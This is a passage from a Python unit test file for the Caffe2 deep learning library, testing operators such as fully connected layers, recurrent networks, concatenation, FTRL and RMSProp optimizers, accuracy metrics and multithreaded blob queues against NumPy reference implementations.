# Assume we are always operating on CUDA or CPU, since RNG is
# inconsistent between CPU and GPU.
device_options = copy.deepcopy(device_options)
assume(len({do.device_type for do in device_options}) == 1)
if set_seed:
for do in device_options:
do.random_seed = 1000
def run(do):
# Reset each time because 'Y' may already exist in the workspace
# on a different device
workspace.ResetWorkspace()
ws = workspace.C.Workspace()
op = core.CreateOperator(
"XavierFill", [], ["Y"],
device_option=do,
shape=[2])
ws.run(op)
return ws.blobs["Y"].fetch()
ys = [run(do) for do in device_options]
for y in ys[1:]:
if set_seed:
np.testing.assert_array_equal(ys[0], y)
else:
with self.assertRaises(AssertionError):
np.testing.assert_array_equal(ys[0], y)
@given(axis=st.integers(min_value=1, max_value=4),
num_output=st.integers(min_value=4, max_value=8),
engine=st.sampled_from(["", "PACKED"]),
**hu.gcs)
def test_fully_connected_axis(self, axis, num_output, engine, gc, dc):
np.random.seed(1)
X = np.random.randn(1, 2, 3, 2, 1).astype(np.float32)
def prod(xs):
p = 1
for x in xs:
p *= x
return p
K = prod(list(X.shape)[axis:])
N = num_output
W = np.random.randn(N, K).astype(np.float32)
b = np.random.randn(N).astype(np.float32)
op = core.CreateOperator(
"FC",
["X", "W", "b"],
["Y"],
engine=engine,
axis=axis)
for name, param in [("X", X), ("W", W), ("b", b)]:
self.ws.create_blob(name).feed(param)
self.ws.run(op)
Y = self.ws.blobs["Y"].fetch()
self.assertEqual(list(Y.shape), list(X.shape)[:axis] + [N])
inputs = [X, W, b]
self.assertDeviceChecks(dc, op, inputs, [0])
for param, _ in enumerate(inputs):
self.assertGradientChecks(gc, op, inputs, param, [0])
@unittest.skipIf(not workspace.has_gpu_support,
"Skipping test due to no gpu present.")
@given(hidden_size=st.integers(min_value=1, max_value=3),
num_layers=st.integers(min_value=1, max_value=3),
bidirectional=st.booleans(),
rnn_mode=st.sampled_from(["lstm"]), # TODO: "gru"
input_mode=st.sampled_from(["linear"]),
dropout=st.floats(min_value=1.0, max_value=1.0),
T=st.integers(min_value=2, max_value=6),
N=st.integers(min_value=1, max_value=4),
D=st.integers(min_value=1, max_value=4))
def test_recurrent(self, hidden_size, num_layers, bidirectional, rnn_mode,
input_mode, dropout, T, N, D):
# There's a bug in MIOpen for N=1 which will be resolved in the next release.
if workspace.has_hip_support:
assume(N>1)
# Random seed, this one happens to pass
seed = 1234
np.random.seed(seed)
# set device option
if workspace.has_hip_support:
device_option = hu.hip_do
engine = 'MIOPEN'
else:
device_option = hu.gpu_do
engine = 'CUDNN'
input_weight_size = hidden_size * D
upper_layer_input_weight_size = hidden_size * hidden_size
if bidirectional:
upper_layer_input_weight_size *= 2
recurrent_weight_size = hidden_size * hidden_size
input_bias_size = hidden_size
recurrent_bias_size = hidden_size
num_directions = 2 if bidirectional else 1
first_layer_sz = input_weight_size + recurrent_weight_size + \
input_bias_size + recurrent_bias_size
upper_layer_sz = upper_layer_input_weight_size + \
recurrent_weight_size + input_bias_size + \
recurrent_bias_size
total_sz = 4 * (first_layer_sz + (num_layers - 1) * upper_layer_sz)
total_sz *= num_directions
W = np.random.rand(total_sz).astype(np.float32)
self.ws.create_blob("WEIGHT").feed(W, device_option=device_option)
op = core.CreateOperator(
"Recurrent",
["INPUT", "HIDDEN_INPUT", "CELL_INPUT", "WEIGHT"],
["OUTPUT", "HIDDEN_OUTPUT", "CELL_OUTPUT",
"RNN_SCRATCH", "DROPOUT_STATES"],
hidden_size=hidden_size,
bidirectional=bidirectional,
rnn_mode=rnn_mode,
dropout=dropout,
input_mode=input_mode,
num_layers=num_layers,
seed=seed,
engine=engine)
X = np.random.randn(T, N, D).astype(np.float32)
self.ws.create_blob("INPUT").feed(X, device_option=device_option)
W = self.ws.blobs["WEIGHT"].fetch()
H = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32)
C = np.random.randn(
num_layers, N, hidden_size * num_directions).astype(
np.float32) if rnn_mode == "lstm" else \
np.empty((1,)).astype(np.float32) # unused in GRU
inputs = [X, H, C, W]
input_idxs = [i for (i, _) in enumerate(inputs)] \
if rnn_mode == "lstm" else [0, 1, 3] # ignore C
for input_idx in input_idxs:
self.assertGradientChecks(
device_option, op, inputs, input_idx, [0],
stepsize=0.01, threshold=0.01)
@given(ndim=st.integers(1, 4),
axis=st.integers(0, 3),
add_axis=st.integers(0, 1),
num_inputs=st.integers(2, 4), **hu.gcs)
def test_depth_concat(self, ndim, axis, add_axis, num_inputs, gc, dc):
assume(axis < ndim)
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7][:ndim]
individual_dims = [1, 2, 3, 4, 5][:num_inputs]
inputs = []
for i in range(num_inputs):
if add_axis == 0:
# Set a unique dim and create the input.
shape[axis] = individual_dims[i]
inputs.append(np.random.randn(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
axis=axis, add_axis=add_axis)
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat(*inputs):
inputs = list(inputs)
if add_axis:
for i in range(len(inputs)):
inputs[i] = np.expand_dims(inputs[i], axis)
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat)
@given(num_inputs=st.integers(2, 4),
order=st.sampled_from([("NCHW", 1), ("NHWC", 3)]),
**hu.gcs)
def test_depth_concat_with_order(self, num_inputs, order, gc, dc):
input_names = ['X0', 'X1', 'X2', 'X3'][:num_inputs]
shape = [2, 3, 5, 7]
individual_dims = [1, 2, 3, 4][:num_inputs]
inputs = []
for i in range(num_inputs):
            # Set a unique dim and create the input.
shape[order[1]] = individual_dims[i]
inputs.append(np.random.rand(*shape).astype(np.float32))
op = core.CreateOperator("Concat", input_names, ["Y", "Y_dims"],
order=order[0])
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(num_inputs):
self.assertGradientChecks(gc, op, inputs, i, [0])
# Reference
def depth_concat_with_order(*inputs):
inputs = list(inputs)
axis = order[1]
input_dims = np.array([np.shape(x)[axis] for x in inputs])
return [np.concatenate(inputs, axis=axis), input_dims]
self.assertReferenceChecks(gc, op, inputs, depth_concat_with_order)
@given(X=hu.arrays(dims=[5, 2],
elements=st.floats(min_value=1.0, max_value=10.0)),
**hu.gcs_cpu_only)
def test_last_n_windows(self, X, gc, dc):
workspace.FeedBlob('input', X)
workspace.FeedBlob('next', np.array(0, dtype=np.int32))
workspace.CreateBlob('output')
collect_net = core.Net('collect_net')
collect_net.LastNWindowCollector(
['output', 'next', 'input'],
['output', 'next'],
num_to_collect=7,
)
plan = core.Plan('collect_data')
plan.AddStep(core.execution_step('collect_data',
[collect_net], num_iter=2))
workspace.RunPlan(plan)
output = workspace.FetchBlob('output')
inputs = workspace.FetchBlob('input')
new_output = np.zeros([7, inputs.shape[1]])
for i in range(inputs.shape[0] * 2):
new_output[i % 7] = inputs[i % inputs.shape[0]]
import numpy.testing as npt
npt.assert_almost_equal(output, new_output, decimal=5)
@given(dtype=st.sampled_from([np.float32, np.float64, np.int32, np.bool]))
def test_print(self, dtype):
data = np.random.permutation(6).astype(dtype)
self.ws.create_blob("data").feed(data)
op = core.CreateOperator("Print", "data", [])
self.ws.run(op)
@given(inputs=hu.tensors(n=2),
in_place=st.booleans(),
momentum=st.floats(min_value=0.1, max_value=0.9),
nesterov=st.booleans(),
lr=st.floats(min_value=0.1, max_value=0.9),
**hu.gcs)
def test_momentum_sgd(
self, inputs, in_place, momentum, nesterov, lr, gc, dc):
grad, m = inputs
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"MomentumSGD",
["grad", "m", "lr"],
["grad" if in_place else "grad_o",
"m" if in_place else "m_o"],
momentum=momentum,
nesterov=int(nesterov),
device_option=gc)
self.assertDeviceChecks(
dc, op, [grad, m, lr], [0])
# Reference
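        # Plain momentum applies m_new = lr * grad + momentum * m as-is;
        # Nesterov momentum extrapolates, applying
        # (1 + momentum) * m_new - momentum * m instead.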
def momentum_sgd(grad, m, lr):
lr = lr[0]
if not nesterov:
adjusted_gradient = lr * grad + momentum * m
return (adjusted_gradient, adjusted_gradient)
else:
m_new = momentum * m + lr * grad
return ((1 + momentum) * m_new - momentum * m, m_new)
self.assertReferenceChecks(gc, op, [grad, m, lr], momentum_sgd)
@given(inputs=hu.tensors(n=3),
in_place=st.booleans(),
decay=st.floats(min_value=0.1, max_value=0.9),
momentum=st.floats(min_value=0.1, max_value=0.9),
lr=st.floats(min_value=0.1, max_value=0.9),
epsilon=st.floats(min_value=1e-5, max_value=1e-2),
**hu.gcs)
def test_rmsprop_sgd(self, inputs, in_place, decay, momentum, lr, epsilon,
gc, dc):
grad, ms, mom = inputs
ms = np.abs(ms) + 0.01
lr = np.asarray([lr], dtype=np.float32)
op = core.CreateOperator(
"RmsProp",
["grad", "ms", "mom", "lr"],
["grad" if in_place else "grad_o",
"ms" if in_place else "ms_o",
"mom" if in_place else "mom_o"],
momentum=momentum, decay=decay, epsilon=epsilon, device_option=gc)
self.assertDeviceChecks(dc, op, [grad, ms, mom, lr], [0])
def rmsprop(grad, ms, mom, lr):
lr = lr[0]
ms_o = ms + (1. - decay) * (np.square(grad) - ms)
mom_o = momentum * mom + lr * grad / np.sqrt(epsilon + ms_o)
grad_o = mom_o
return (grad_o, ms_o, mom_o)
self.assertReferenceChecks(gc, op, [grad, ms, mom, lr], rmsprop)
# Reference
@staticmethod
def _dense_ftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
# python port of Sigrid's implementation
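        # FTRL-Proximal closed-form update, per coordinate:
        #   sigma = (sqrt(n + g^2) - sqrt(n)) / alpha
        #   z    += g - sigma * w;  n += g^2
        #   w     = (sign(z) * lambda1 - z) / ((beta + sqrt(n)) / alpha + lambda2),
        #           zeroed wherever |z| <= lambda1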
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
w = (np.sign(z) * lambda1 - z) / (
(beta + np.sqrt(n)) / alpha + lambda2)
w[np.abs(z) <= lambda1] = 0
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_ftrl, alpha, beta, lambda1, lambda2))
# Reference
@staticmethod
def _dense_gftrl(alpha, beta, lambda1, lambda2, w, nz, g):
if isinstance(alpha, np.ndarray):
alpha = np.asscalar(alpha)
old_shape = g.shape
n = np.take(nz, 0, axis=-1)
z = np.take(nz, 1, axis=-1)
output_dim = g.shape[0]
w = w.reshape(output_dim, -1)
g = g.reshape(output_dim, -1)
n = n.reshape(output_dim, -1)
z = z.reshape(output_dim, -1)
input_dim = g.shape[1]
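        # Same accumulator updates as dense FTRL, but shrinkage is applied
        # per input column using the l2 norm of z across the output
        # dimension, so whole columns are zeroed at once (group sparsity).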
g2 = g * g
sigma = (np.sqrt(n + g2) - np.sqrt(n)) / alpha
z += g - sigma * w
n += g2
z_norms = np.linalg.norm(z, 2, axis=0)
z_norms = z_norms + 1e-6
w = z * ((lambda1 * np.sqrt(output_dim)) / z_norms - 1) / \
((beta + np.sqrt(n)) / alpha + lambda2)
for i in range(input_dim):
if z_norms[i] <= lambda1 * np.sqrt(output_dim):
w[:, i] = 0
w = w.reshape(old_shape)
n = n.reshape(old_shape)
z = z.reshape(old_shape)
return (w, np.stack([n, z], axis=-1))
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_gftrl_sgd(self, inputs, in_place, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"GFtrl",
["var", "nz", "grad"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad],
partial(self._dense_gftrl, alpha, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd(self, inputs, alpha, beta, lambda1, lambda2,
engine, gc, dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad"],
["var", "nz"],
alpha=alpha, beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad], [0])
# Reference
def ftrl(w, nz, i, g):
sw, snz = self._dense_ftrl(alpha, beta, lambda1, lambda2,
w[i], nz[i], g)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad], ftrl)
# Reference
@staticmethod
def _dense_ftrl_send_alpha_by_input(beta, lambda1, lambda2, w, nz, g, alpha):
return TestOperators._dense_ftrl(alpha, beta, lambda1, lambda2, w, nz,
g)
@given(inputs=hu.tensors(n=4),
in_place=st.booleans(),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_ftrl_sgd_send_alpha_by_input(self, inputs, in_place, alpha, beta,
lambda1, lambda2, engine, gc, dc):
var, n, z, grad = inputs
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"Ftrl",
["var", "nz", "grad", "alpha"],
["var" if in_place else "var_o",
"nz" if in_place else "nz_o"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, grad, alpha], [0])
self.assertReferenceChecks(
gc, op, [var, nz, grad, alpha],
partial(self._dense_ftrl_send_alpha_by_input, beta, lambda1, lambda2))
@given(inputs=hu.tensors(n=4),
alpha=st.floats(min_value=0.01, max_value=0.1),
beta=st.floats(min_value=0.1, max_value=0.9),
lambda1=st.floats(min_value=0.001, max_value=0.1),
lambda2=st.floats(min_value=0.001, max_value=0.1),
engine=st.sampled_from([None, "SIMD"]),
**hu.gcs_cpu_only)
def test_sparse_ftrl_sgd_send_alpha_by_input(self, inputs, alpha, beta,
lambda1, lambda2, engine, gc,
dc):
var, n, z, grad = inputs
# generate fake subset manually because hypothesis is too complicated :)
indices = np.arange(var.shape[0])
indices = indices[indices % 2 == 0]
grad = grad[indices]
n = np.abs(n)
nz = np.stack([n, z], axis=-1)
alpha = np.array(alpha).astype(np.float32)
op = core.CreateOperator(
"SparseFtrl",
["var", "nz", "indices", "grad", "alpha"],
["var", "nz"],
beta=beta, lambda1=lambda1, lambda2=lambda2,
engine=engine,
device_option=gc)
self.assertDeviceChecks(
dc, op, [var, nz, indices, grad, alpha], [0])
# Reference
def ftrl(w, nz, i, g, alpha):
sw, snz = self._dense_ftrl_send_alpha_by_input(beta, lambda1,
lambda2, w[i], nz[i],
g, alpha)
w[i] = sw
nz[i] = snz
return (w, nz)
self.assertReferenceChecks(gc, op, [var, nz, indices, grad, alpha],
ftrl)
# TODO: (bddppq) test_unique keeps running into segfault on rocm 1.8.2
@given(input=hu.tensor(max_value=20,
max_dim=1,
dtype=np.int32,
elements=st.integers(min_value=0, max_value=10)),
with_remapping=st.booleans(),
**hu.gcs_no_hip)
def test_unique(self, input, with_remapping, gc, dc):
op = core.CreateOperator(
"Unique",
["input"],
["unique"] + (["remapping"] if with_remapping else []),
device_option=gc)
self.assertDeviceChecks(dc, op, [input], [0])
# Validator
def unique_valid(input, unique, remapping=None):
self.assertEqual(unique.size, len(set(input)))
self.assertEqual(sorted(unique), sorted(set(input)))
if with_remapping:
self.assertEqual(remapping.shape, input.shape)
remapped = [unique[remapping[i]] for i in range(len(input))]
np.testing.assert_array_equal(remapped, input)
self.assertValidationChecks(gc, op, [input], unique_valid)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
top_k=st.integers(min_value=1, max_value=3),
**hu.gcs)
def test_accuracy(self, prediction, labels, top_k, gc, dc):
        if top_k > 1:
gc = hu.cpu_do
op = core.CreateOperator(
"Accuracy",
["prediction", "labels"],
["accuracy"],
top_k=top_k,
device_option=gc
)
def op_ref(prediction, labels, top_k):
N = prediction.shape[0]
correct = 0
for i in range(0, len(prediction)):
pred_sorted = sorted(
([item, j] for j, item in enumerate(prediction[i])),
key=lambda x: x[0],
reverse=True
)
max_ids = [x[1] for x in pred_sorted[0:top_k]]
for m in max_ids:
if m == labels[i]:
correct += 1
accuracy = correct / N
return (accuracy,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels, top_k],
reference=op_ref)
@given(target_probabilities=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0.01,
max_value=1)),
**hu.gcs)
def test_perplexity(self, target_probabilities, gc, dc):
op = core.CreateOperator(
"Perplexity",
["target_probabilities"],
["perplexity"]
)
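        # Perplexity here is the inverse geometric mean of the target
        # probabilities: prod_i p_i ** (-1 / N).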
def op_ref(target_probabilities):
N = target_probabilities.shape[0]
perplexities = np.power(target_probabilities, -1.0 / N)
perplexity = reduce(lambda x, y: x * y, perplexities)
return (perplexity,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[target_probabilities],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_segment_ids(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToSegmentIds",
["lengths"],
["segment_ids"])
def op_ref(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_range_fill(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsRangeFill",
["lengths"],
["increasing_seq"])
def op_ref(lengths):
sids = []
for _, l in enumerate(lengths):
sids.extend(list(range(l)))
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(**hu.gcs_cpu_only)
def test_segment_ids_to_ranges(self, gc, dc):
lengths = [4, 6, 3, 2, 0, 4]
op = core.CreateOperator(
"SegmentIdsToRanges",
["segment_ids"],
["ranges"])
def op_ref(segment_ids):
ranges = [np.array([0, 0], dtype=np.int32)]
prev = 0
for i, sid in enumerate(segment_ids):
while sid != prev:
prev += 1
ranges.append(np.array([i, 0], dtype=np.int32))
ranges[-1][1] += 1
return (np.array(ranges, dtype=np.int32), )
def lengths_to_segment_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return (np.array(sids, dtype=np.int32), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=np.array(lengths_to_segment_ids(lengths), dtype=np.int32),
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_lengths_to_ranges(self, lengths, gc, dc):
op = core.CreateOperator(
"LengthsToRanges",
["lengths"],
["ranges"])
def op_ref(x):
if not x.size:
return (x.reshape((0, 2)), )
return (np.column_stack((np.concatenate(([0], np.cumsum(x)[:-1])),
x)), )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=op_ref)
@given(prediction=hu.arrays(dims=[10, 3],
elements=st.floats(allow_nan=False,
allow_infinity=False,
min_value=0,
max_value=1)),
labels=hu.arrays(dims=[10],
dtype=np.int32,
elements=st.integers(min_value=0,
max_value=3 - 1)),
**hu.gcs)
def test_multi_class_accuracy(self, prediction, labels, gc, dc):
op = core.CreateOperator(
"MultiClassAccuracy",
["prediction", "labels"],
["accuracies", "amounts"]
)
def op_ref(prediction, labels):
N = prediction.shape[0]
D = prediction.shape[1]
accuracies = np.empty(D, dtype=float)
accuracies.fill(0)
amounts = np.empty(D, dtype=int)
amounts.fill(0)
max_ids = np.argmax(prediction, axis=1)
for i in range(0, N):
max_id = max_ids[i]
label_id = labels[i]
if max_id == label_id:
accuracies[label_id] += 1
amounts[label_id] += 1
for i in range(0, D):
amount = amounts[i]
if amount:
accuracies[i] /= amount
return (accuracies, amounts,)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[prediction, labels],
reference=op_ref)
@given(lengths=st.lists(st.integers(min_value=0, max_value=10),
min_size=0,
max_size=10),
**hu.gcs_cpu_only)
def test_segment_ids_to_lengths(self, lengths, gc, dc):
op = core.CreateOperator(
"SegmentIdsToLengths",
["segment_ids"],
["lengths"])
def lengths_to_ids(lengths):
sids = []
for i, l in enumerate(lengths):
sids.extend(l * [i])
return sids
segment_ids = lengths_to_ids(lengths)
def ids_to_lengths(ids):
ids_length = len(ids)
if ids_length == 0:
return (np.array([], dtype=np.int32),)
lengths = []
# segment id starts with 0
prev_id = -1
tmp_length = 0
for idx in range(ids_length):
cur_id = ids[idx]
if cur_id != prev_id:
if idx != 0:
lengths.append(tmp_length)
while prev_id + 1 != cur_id:
lengths.append(0)
prev_id += 1
prev_id = cur_id
tmp_length = 0
tmp_length += 1
lengths.append(tmp_length)
return (np.array(lengths, dtype=np.int32),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(segment_ids, dtype=np.int32)],
reference=ids_to_lengths)
@given(lengths=st.lists(st.integers(min_value=1, max_value=10),
min_size=0,
max_size=10),
power=st.sampled_from([0.5, 1.0, 1.5, 2.0]),
**hu.gcs_cpu_only)
def test_lengths_to_weights(self, lengths, power, gc, dc):
op = core.CreateOperator(
"LengthsToWeights",
["lengths"],
["weights"],
power=power)
def lengths_to_weights(lengths):
weighted_length = []
for l in lengths:
weighted_length.extend(l * [1 / pow(l, power)])
return (np.array(weighted_length, dtype=float),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[np.array(lengths, dtype=np.int32)],
reference=lengths_to_weights)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_abs(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Abs",
["input"],
["output"]
)
def abs_ref(input_tensor):
return (np.abs(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=abs_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_cos(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Cos",
["input"],
["output"]
)
def cos_ref(input_tensor):
return (np.cos(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=cos_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=-10,
max_value=10)),
**hu.gcs)
def test_sin(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Sin",
["input"],
["output"]
)
def sin_ref(input_tensor):
return (np.sin(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=sin_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(allow_nan=False,
allow_infinity=False)),
**hu.gcs)
def test_exp(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Exp",
["input"],
["output"]
)
def exp_ref(input_tensor):
return (np.exp(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=exp_ref)
@given(input_tensor=hu.arrays(
dims=[10], elements=st.floats(min_value=1,
max_value=10000)),
**hu.gcs_cpu_only)
def test_log(self, input_tensor, gc, dc):
op = core.CreateOperator(
"Log",
["input"],
["output"]
)
def log_ref(input_tensor):
return (np.log(input_tensor),)
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[input_tensor],
reference=log_ref)
self.assertGradientChecks(gc, op, [input_tensor], 0, [0])
def test_blobs_dequeue_timeout(self):
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=5,
num_blobs=1)
self.ws.run(op)
t = time.time()
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
["out"],
timeout_secs=0.2)
self.assertRaises(RuntimeError, lambda: self.ws.run(op))
t = time.time() - t
self.assertGreater(t, 0.19)
@given(num_threads=st.integers(1, 10), # noqa
num_elements=st.integers(1, 100),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_blobs_queue_threading(self, num_threads, num_elements,
capacity, num_blobs, do):
"""
- Construct matrices of size N x D
- Start K threads
- Push all N rows into the queue of capacity C
- Pull all N rows out of the queue.
        - Verify that the output matrices are permutations of the rows of
          the original matrices.
"""
import threading
        try:
            import queue
        except ImportError:
            # Py2: the stdlib module is named Queue
            import Queue as queue
op = core.CreateOperator(
"CreateBlobsQueue",
[],
["queue"],
capacity=capacity,
num_blobs=num_blobs,
device_option=do)
self.ws.run(op)
xs = [np.random.randn(num_elements, 5).astype(np.float32)
for _ in range(num_blobs)]
q = queue.Queue()
for i in range(num_elements):
q.put([x[i] for x in xs])
def enqueue(t):
while True:
feed_blobs = ["x_{}_{}".format(i, t) for i in range(num_blobs)]
op = core.CreateOperator(
"EnqueueBlobs",
["queue"] + feed_blobs,
feed_blobs,
device_option=do)
try:
elems = q.get_nowait()
for elem, feed_blob in zip(elems, feed_blobs):
self.ws.create_blob(feed_blob).feed(
elem, device_option=do)
self.ws.run(op)
except queue.Empty:
return
# Create all blobs before racing on multiple threads
# (blob creation is not threadsafe)
for t in range(num_threads):
for i in range(num_blobs):
self.ws.create_blob("x_{}_{}".format(i, t))
threads = [threading.Thread(target=enqueue, args=(t,))
for t in range(num_threads)]
for thread in threads:
thread.start()
for n in range(num_elements):
dequeue_blobs = ["y_{}_{}".format(i, n) for i in range(num_blobs)]
op = core.CreateOperator(
"DequeueBlobs",
["queue"],
dequeue_blobs,
device_option=do)
self.ws.run(op)
for thread in threads:
thread.join()
op = core.CreateOperator("CloseBlobsQueue", ["queue"], [])
self.ws.run(op)
ys = [np.vstack([self.ws.blobs["y_{}_{}".format(i, n)].fetch()
for n in range(num_elements)])
for i in range(num_blobs)]
for i in range(num_blobs):
self.assertEqual(ys[i].shape, xs[i].shape)
for j in range(num_elements):
# Verify that the rows of the returned blob are a
# permutation. The order may be different due to
# different threads racing.
self.assertTrue(
any(np.array_equal(xs[i][j], ys[i][k])
for k in range(num_elements)))
@given(num_producers=st.integers(1, 10),
num_consumers=st.integers(1, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_safe_blobs_queue(self, num_producers, num_consumers,
capacity, num_blobs, do):
init_net = core.Net('init_net')
queue = init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs)
producer_steps = []
truth = 0
for i in range(num_producers):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for times in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queue] + blobs, blobs + [status])
count = (i + 1) * 10
step = core.execution_step(name, net, num_iter=count)
truth += count
producer_steps.append(step)
producer_exit_net = core.Net('producer_exit_net')
producer_exit_net.CloseBlobsQueue([queue], 0)
producer_step = core.execution_step('producer', [
core.execution_step(
'producers', producer_steps, concurrent_substeps=True),
core.execution_step('producer_exit', producer_exit_net)]
)
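        # Producer i enqueues (i + 1) * 10 items, so the consumers'
        # counters must sum to exactly `truth` once the queue is closed.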
consumer_steps = []
counters = []
const_1 = init_net.ConstantFill([], 1, value=1.0)
for i in range(num_consumers):
name = 'consumer_%d' % i
net1 = core.Net(name)
